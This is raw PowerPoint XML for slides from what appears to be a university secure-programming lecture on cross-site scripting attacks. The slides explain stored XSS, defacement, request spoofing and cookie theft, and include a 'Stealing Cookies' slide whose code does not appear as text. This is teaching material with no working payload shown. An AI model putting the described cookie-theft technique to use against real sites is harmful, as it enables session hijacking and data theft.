Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag470.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag475.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag478.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag483.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag388.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag393.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag402.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag410.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag415.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag423.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag436.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag444.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag397.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag418.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag431.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag439.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag447.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag452.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag460.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag465.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag468.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag473.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag481.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag391.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag396.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag400.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag405.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag426.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag421.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag437.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag442.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag463.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag394.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag458.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag479.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag389.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag416.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag411.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag427.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag432.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag453.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag474.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag448.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag469.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag406.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag401.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag417.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag422.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag443.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag464.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag395.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag438.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag459.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag480.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide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3C7DD5-360B-4921-B708-790C100BED34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="1585049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" sz="400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  School of </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Engineering and Computer Science</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   Te Kura </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mātai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pūkaha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pūrorohiko</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2346EBA-D898-4D6A-A7A1-0D17AC0663CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2036522" y="1585049"/>
            <a:ext cx="5071004" cy="2477601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-NZ" sz="4400" b="1" dirty="0" err="1"/>
              <a:t>CYBR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="4400" b="1" dirty="0"/>
              <a:t> 271 T2 2020 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-NZ" sz="4400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-NZ" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure Programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-NZ" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" b="1" dirty="0"/>
              <a:t>Ian Welch, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Harith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" b="1" dirty="0"/>
              <a:t> Al-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Sahaf</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="3600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-NZ" sz="1100" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-NZ" sz="500" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-NZ" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Scripting – Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Connector 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45DF401D-C517-4730-A3F8-AE7BED0886FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677625" y="3410889"/>
            <a:ext cx="8049099"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8E90A38-3AC2-4FB7-98F2-AFF15AEB3BD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677624" y="4057115"/>
            <a:ext cx="8049099" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-NZ" sz="1200" dirty="0"/>
              <a:t>Du, Wenliang, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="1200" i="1" dirty="0"/>
              <a:t>Computer &amp; Internet Security: A Hands-on Approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="1200" dirty="0"/>
              <a:t>”, 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="1200" baseline="30000" dirty="0"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="1200" dirty="0"/>
              <a:t> ed, 2019 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="1200" b="1" u="sng" dirty="0"/>
              <a:t>Chapter 11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="1200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="1200" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1665816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94652-58EF-4B6E-8478-7F8591A8E841}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack (cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E7E4851-4E36-46B2-B743-3D3D981D0D49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These channels, e.g., profiles and comments, are supposed to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>data channels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But data provided by users can contain HTML markups and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>JavaScript code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the input is not sanitized properly by the website, it is sent to other users’ browsers through the channel and gets executed by the browsers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers consider it like any other code coming from the website. Therefore, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the code is given the same privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> as that from the website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47FDCD2A-A7FF-47E0-A625-5A315D21864D}"/>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9</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2355477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CCA3-797A-46B9-AF46-00F7391AC496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Damage caused by XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{201A9ADC-25E8-4323-81D4-CF93EE96168F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web defacing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: JavaScript code can use Document Object Model (DOM) APIs to access the DOM nodes inside the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>hosting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> page. Therefore, the injected JavaScript code can make arbitrary changes to the page. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: JavaScript code can change a news article page to something fake or change some pictures on the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofing requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: The injected JavaScript code can send HTTP requests to the server on behalf of the user. (Discussed in later slides)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealing information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: The injected JavaScript code can also steal victim’s private data including the session cookies, personal data displayed on the web page, data stored locally by the web application.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{225BA30F-B939-4E59-A4C1-D71351F02B0B}"/>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10</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1402995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Rectangle 253">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC0F17AB-2A2F-4988-8EFB-FA3C23E56163}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621591" y="2990729"/>
            <a:ext cx="8061158" cy="1206239"/>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253" name="Rectangle 252">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42EA70C8-7749-4D0C-9BEB-EC5A3F2A9E9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625642" y="1459832"/>
            <a:ext cx="8061158" cy="488665"/>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2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{191F663C-43FE-4B5D-9B87-0327623E2799}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stealing Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25B0A77B-90B3-4361-A51B-2E3DD810E907}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Print out cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send out cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301229" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" sz="15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C847A6C8-D009-4377-A66A-D79EEC36D4F7}"/>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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="104" name="Group 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{254BDE8B-012E-44AD-AB6F-EE1F69013C19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="818985" y="1594484"/>
            <a:ext cx="4403726" cy="236538"/>
            <a:chOff x="2543175" y="2540000"/>
            <a:chExt cx="4403726" cy="236538"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Freeform 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B4944A7-0C19-4C94-8D6C-268FC9AECB9B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId101"/>
              </p:custDataLst>
